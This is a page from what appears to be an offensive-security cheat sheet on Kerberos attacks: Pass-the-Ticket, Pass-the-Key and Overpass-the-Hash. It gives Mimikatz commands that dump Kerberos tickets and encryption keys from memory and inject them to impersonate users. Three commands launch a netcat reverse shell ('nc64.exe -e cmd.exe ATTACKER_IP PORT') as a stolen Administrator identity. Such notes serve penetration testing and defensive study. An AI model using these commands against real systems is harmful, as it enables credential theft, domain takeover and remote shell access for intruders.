Kerberos

Pass-the-Ticket (PtT)

This attack uses stolen Kerberos tickets (TGTs or service tickets) to authenticate to services without needing the user's password or hash.

  1. Extracting Kerberos Tickets

    • Use Mimikatz to export Kerberos tickets from memory:

      mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

  2. Using Extracted Tickets

    • Load and use a specific Kerberos ticket for authentication:

      mimikatz # kerberos::ptt [TICKET_FILE_NAME].kirbi

Pass-the-Key (PtK)

This attack uses extracted session keys (RC4, AES128, or AES256) instead of passwords to authenticate as a user. It’s a more versatile extension of the Pass-the-Hash (PtH) attack.

  1. Extracting Session Keys

    • Retrieve encryption keys (RC4, AES128, AES256) from memory:

      mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

  2. Using Extracted Keys

    • Launch processes using extracted session keys for authentication.

    • If RC4 Key (Equivalent to NTLM Hash):

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /rc4:RC4_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

    • If AES128 Key:

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes128:AES128_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

    • If AES256 Key:

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes256:AES256_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

Overpass-the-Hash (OPtH)

  • Concept:

    • RC4 keys are equivalent to the NTLM hash of a user.

    • If the NTLM hash is available, it can be used to request a Ticket Granting Ticket (TGT), provided RC4 is an enabled encryption protocol.

  • Key Details:

    • NTLM hash = RC4 key.

    • Used to perform Kerberos authentication without needing the original password.

PreviousLateralizationNextPassing the Hash (PtH)

Last updated